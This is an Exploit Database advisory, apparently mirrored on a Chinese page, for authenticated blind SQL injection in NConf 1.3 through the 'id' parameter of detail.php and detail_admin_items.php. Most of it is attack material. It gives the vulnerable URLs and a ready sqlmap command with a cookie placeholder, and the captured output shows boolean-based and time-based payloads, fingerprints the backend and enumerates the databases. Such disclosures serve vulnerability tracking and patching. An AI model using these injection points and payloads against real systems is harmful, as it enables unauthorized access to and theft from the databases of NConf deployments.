NConf 1.3 – ‘/detail.php/detail_admin_items.php?id’ SQL Injection

• Exploit Database
• 10 阅读

• 作者： haidao
  日期： 2013-01-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24269/

• # Exploit Title:nconfdetail.php，detail_admin_items.phpblind injection
  # Date: 2013/1/20
  # Exploit Author: haidao，54haidao@gmail.com
  # Software Link: http://sourceforge.net/projects/nconf/files/nconf/
  # Version:nconf 1.3
  # Tested on: Server: Apache/2.2.15 (Centos)PHP/5.3.3
   
  
  i find two files we can inject : 
  /nconf/detail.php?id=1
  /nconf/detail_admin_items.php?type=attr&class=host&id=207
  
  both the inject point is 'id',, u can inject itby sqlmap,,of course u mast have a account to login.
  
  injectlike this:
  python sqlmap.py -u "http://192.168.2.103/nconf/detail.php?id=1"-p id--cookie="XXX"--dbs
  
  [*] starting at 23:45:22
  
  [23:45:22] [INFO] resuming back-end DBMS 'mysql' 
  [23:45:22] [INFO] testing connection to the target url
  sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  ---
  Place: GET
  Parameter: id
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=1 AND 6429=6429
  
  Type: AND/OR time-based blind
  Title: MySQL > 5.0.11 AND time-based blind
  Payload: id=1 AND SLEEP(5)
  ---
  [23:45:22] [INFO] the back-end DBMS is MySQL
  web server operating system: Linux CentOS 6.3
  web application technology: PHP 5.3.3, Apache 2.2.15
  back-end DBMS: MySQL 5.0.11
  [23:45:22] [INFO] fetching database names
  [23:45:22] [INFO] fetching number of databases
  [23:45:22] [INFO] resumed: 3
  [23:45:22] [INFO] resumed: information_schema
  [23:45:22] [INFO] resumed: nconf
  [23:45:22] [INFO] resumed: test
  available databases [3]:
  [*] information_schema
  [*] nconf
  [*] test